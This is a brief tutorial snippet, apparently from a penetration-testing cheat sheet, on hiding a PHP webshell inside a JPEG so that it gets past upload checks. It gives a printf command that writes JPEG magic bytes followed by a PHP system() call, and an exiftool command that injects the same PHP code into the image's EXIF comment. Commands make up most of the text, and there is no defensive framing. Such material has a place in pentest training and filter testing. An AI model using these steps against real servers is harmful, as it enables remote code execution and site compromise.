If you can upload a jpg file, it is possible to hide a webshell in it.
A jpeg file is identified by its first bytes which have the value: ffd8ffe0
To generate a file that will be identified as having a valid Jpeg header:
printf "\xff\xd8\xff\xe0<?php system('id'); ?>" > webshell.jpg
This file will be recognized as a jpg file
$ file webshell.jpg webshell.jpg: JPEG image data
An image file contains a lot of information: shooting date, location, camera type...
We can inject php code in this data.
exiftool -Comment='<?php system('id'); ?>' webshell.jpg